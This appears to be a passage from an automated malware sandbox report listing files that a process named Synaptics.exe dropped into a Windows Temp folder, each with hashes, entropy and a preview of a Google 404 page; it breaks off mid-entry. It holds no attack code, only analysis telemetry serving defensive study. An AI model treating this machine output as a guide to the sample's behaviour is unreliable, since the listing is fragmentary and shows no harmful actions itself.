                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZD2m1Z-3GFAa9viCQ-VjQw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\TvvYVQ7.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.264724626657637
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0MJDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+3N+pAZewRDK4mW
                                                                                                                                                                                  MD5:7BC82EBB2925D0E504535717C74C78B1
                                                                                                                                                                                  SHA1:41B2EB86D4175169680276E86E720BBBDFA27BEE
                                                                                                                                                                                  SHA-256:C7C4CA8F71FC2BAC3D11F1768D887C9DDB0B49CB62A669C0FF48823FF8CC4B9E
                                                                                                                                                                                  SHA-512:6E21F1E69AA38AF8EA807632C6861F2F46E2C460B89C8282276C7E388E281BFC6D9C0DBB730167A0729CA8C45154C3BADA5CAA622DC9005B1F8410EB5518C64A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="g_qym3QuJxKG3mD4QkbPdA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\URRi7Yt.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.263423690034704
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+038SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+48+pAZewRDK4mW
                                                                                                                                                                                  MD5:7498218428C8700E4EEEC573C346D4A4
                                                                                                                                                                                  SHA1:2B67BEAD935C6CCEAA41D27369D435C1C3D519FB
                                                                                                                                                                                  SHA-256:A10EC7010986A56F51E5A63978E42E60D544A910210C7213B08CE8E21958C2C5
                                                                                                                                                                                  SHA-512:957BB6FEBEED3A9700AA502B3C4FA9F94558539E38EAD9BC61E5E0BDDC67012490EA18E90B22B0E96E60E1D86B6A1B7A5B7EDFEEE55CE8DD257E8C1CA0CDC536
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="oMBhRbbG6QwqXo_yKcwh6Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\UTbNM9t.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.252911202977541
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0d9ISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+A9I+pAZewRDK4mW
                                                                                                                                                                                  MD5:A95173C00629AC8B2AB44E59B0C45974
                                                                                                                                                                                  SHA1:BE7A2C5536D5AF8F614F48A971E7077887025626
                                                                                                                                                                                  SHA-256:ED9430AD56F9C64362C74CADB62DC2A6269B4E45B8EBA44E50EBE00FDB197A71
                                                                                                                                                                                  SHA-512:4EB945C7AAD6953FD25F5C1672E62E381E1F33B5F085B018485D724AA1ED0608C94CA16168791D07640F0934D48183E57E4A3C75F28026F34F46FFC9F3F8FCE9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="n0n3atTZqSufnE2EWN00Dg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\VOHblYN.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.264071988114894
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0MSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+v+pAZewRDK4mW
                                                                                                                                                                                  MD5:8FB059007174F5040A19350339FB1332
                                                                                                                                                                                  SHA1:84CEA94E9DD83D1683E662B85E0E967493E5D805
                                                                                                                                                                                  SHA-256:224E405742DD3BB6AA21F927B5CD733389C592083A516CF03FDBD4187AA0E690
                                                                                                                                                                                  SHA-512:F9CBA631D3C5750F81035191B622CFDD53A4571DEADE322A1917C8FE4AC8C37DEA62FBE69219FE7ADF3D0617458280C82FF5E92E444BEBE7AD19B0E6B8FC9035
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="a8WTabe8FPLSHlrBIXU1xw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\WGBGJcR.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.26472364961366
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+02MISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+f+pAZewRDK4mW
                                                                                                                                                                                  MD5:546DD613B845DFE8526FA08D1996A294
                                                                                                                                                                                  SHA1:876B77CD3B462B5A92570074F55060DA06E75C43
                                                                                                                                                                                  SHA-256:FDD377946ED1552D64ABCF7D5EFCF1F4519732CE110FE58E6C9726F72852BC23
                                                                                                                                                                                  SHA-512:C17D2172E49565C3A80E613A3FBD148B8CDA22AE81D99AD666E34B6EA6750BADAFE58E73E0737AE714111E0589BE4DADAD271BCF201DF7203D60063187C99CD2
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Jow6QF98JnQ5q_o4SYlBiQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\WHl5XKF.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.255277355856383
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0DtSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+K+pAZewRDK4mW
                                                                                                                                                                                  MD5:2A6BA5C0B430609E4E84AD2D8C2D1D61
                                                                                                                                                                                  SHA1:733287C04985069A7D63BCC101AE0D2157D4B705
                                                                                                                                                                                  SHA-256:0B6D9A377C008423CF57FD168D7483AF0BD82960B685C9CE80F4AF0BB46F11EE
                                                                                                                                                                                  SHA-512:F53BBF85751803032225134148B4A1844AF10F01E4A446B4112CCF969FE69F4C017F9AA842809B1C1C3BB63F3E82215E199DB8C493F59C71B5E8F6F968AFE19F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gE79QFiCAbT-cyewn4_hYQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\WksBXCF.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.259291008112307
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0mRwSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+w+pAZewRDK4mW
                                                                                                                                                                                  MD5:D529110F3BA9CC7E457CF0CD6DD72EC4
                                                                                                                                                                                  SHA1:3CB15C3D37B69197F48D623F4CAE169A552820A4
                                                                                                                                                                                  SHA-256:3B7D7B3C11A373B50DDF3CE00368CAC9716BCF23C73A0C3D9BEB7C3FC432EBAC
                                                                                                                                                                                  SHA-512:76B67E5A9EDB1FB7618EB5FDEE5AEF98197213F9634DA385FAE8C8EB727A38B22E2F6DE7F438364AC33E6A58BAF58C5B39FE485F1369E973E35FBF6D27E49E79
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="aQosOF3rd84MwF7iBVaIKg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\XYRei5N.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.2568294561054545
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+01ObSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+tb+pAZewRDK4mW
                                                                                                                                                                                  MD5:8E460B02DAD5EE7725F9BD1B827F3568
                                                                                                                                                                                  SHA1:02F923A55A4D565733523D41F9230FE90D79440B
                                                                                                                                                                                  SHA-256:0A494BAB770BDECF33F75BC91266B4E466BE6E6ABDD88B7C457DD01129F590A5
                                                                                                                                                                                  SHA-512:C32727B38F74A1204F3CE15EEA4D540577C1C0DB0198EAF20DAD49B96AE10703B435F64CA83E6BA5A6491427BBC501568214E5F26D310A7F566302104FDD9860
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="EIg278lCsaXERp_CRph7eQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\ZdLO3JM.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.251593130399113
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0fSSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+h+pAZewRDK4mW
                                                                                                                                                                                  MD5:BBD8F9ABDEE33F5FE44206D40F789077
                                                                                                                                                                                  SHA1:8E6ADB52D9DA00CF2B9CB07F343FD85E0304024B
                                                                                                                                                                                  SHA-256:413BA6D418BD375259C972395674D4B8D8675F534789E08DD71FE628D345850C
                                                                                                                                                                                  SHA-512:15FBFC1B3819E77FD07B8E832AF99B8889AB84DE97A91D33DDB41573766ABA9E9E8427F4382E5A94BF39E0C7C0A611BD2DF412B5F1DC31DF9ADDAE6E7BA5269D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ioyu6G0Yc_lsGtGOWptGnQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\ai3a56m.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.247480282058353
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0JZSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+YZ+pAZewRDK4mW
                                                                                                                                                                                  MD5:57B16DACCA1EE809F403CFEC1B084799
                                                                                                                                                                                  SHA1:D26FE426D2636497CC322DCC3D2C2CD8184A48B2
                                                                                                                                                                                  SHA-256:15F4E3F4C3774FE0994D9458584F9AA65703DAD7718CD47543F2DD054888BAF7
                                                                                                                                                                                  SHA-512:EC1452A0545C3C125F832EB7C5E50C146BDFE84BBFBD4738F0182F2E49744BE70BF1A8C5174985CFAACA74D7187A1139E318A5A54E1C39F35E3D99A9FD9D27E0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1hEW5gzd2gYYltxcrRWlKw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\cEbZhhG.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.262430589061409
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+00aSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Za+pAZewRDK4mW
                                                                                                                                                                                  MD5:4DA71F3F7A40343807E90C1EB96620F1
                                                                                                                                                                                  SHA1:0EB906BA1B58445B491E693F81B391A0B7BE8AFD
                                                                                                                                                                                  SHA-256:09AB6783283024C9E77A8FB41066CCACFA8626BB0260D8210AA4832D76252BAC
                                                                                                                                                                                  SHA-512:96627D75C962118D82DB612F1B8A3448DF2C6D9C701159A12BACDD550C404FFB6A699C6A7A79442307BC06195BBF894AFFF262F1A88305322398CA75695DAFF0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cniCuKVZchCqYkkVItdkfQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\dUYbfVJ.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.2851827298390015
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0qSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+N+pAZewRDK4mW
                                                                                                                                                                                  MD5:68A1E3A0EEB2B922304CD1B478D51939
                                                                                                                                                                                  SHA1:AD610A9C29707C5EE0A180D7076988C172E6F694
                                                                                                                                                                                  SHA-256:87E768561547C1183D0091B68C0896457F02F32F9468E7DDDDD9EE0CF5128A4F
                                                                                                                                                                                  SHA-512:3C61E76F708DC2932367DF1948146715FC57E446F4411F935BE9ABA50A49B44519A9A2C79B2A570CDFDD76ADF26A5AEC7A6152B9927A782462D1D24D1A2AAC09
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KXfFUAa1ZPF6GRYHqiD8OA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\dtXzP6g.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.260305091906621
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0/SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+I+pAZewRDK4mW
                                                                                                                                                                                  MD5:DC999BC39A5C90F24199A5E8DD6D5AC9
                                                                                                                                                                                  SHA1:5CFE4E9649277DE6D5431F5DBB8C734B44BBA891
                                                                                                                                                                                  SHA-256:2E3FC6D8F3206A21DEB0DC8EDC16E9B56E3193B717CB6809B8FE2FC9DEC51CFE
                                                                                                                                                                                  SHA-512:2E203FA55A344164056A8113218582B167079DBA359D6F1D46CBD90AB5C6285ECE82A3AE60BCFD8B15332DD76807F2485EBC08A38D5AF0A3CA2DA689CC5146E3
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7_rGaBC_7srAOKe62clfzQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\dxHXJPM.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.261806599725284
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0eiVbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+3it+pAZewRDK4mW
                                                                                                                                                                                  MD5:C3DB9C3BA4770CD1F9693088B08EC603
                                                                                                                                                                                  SHA1:B1ABAF20778839428B2458537961968748478189
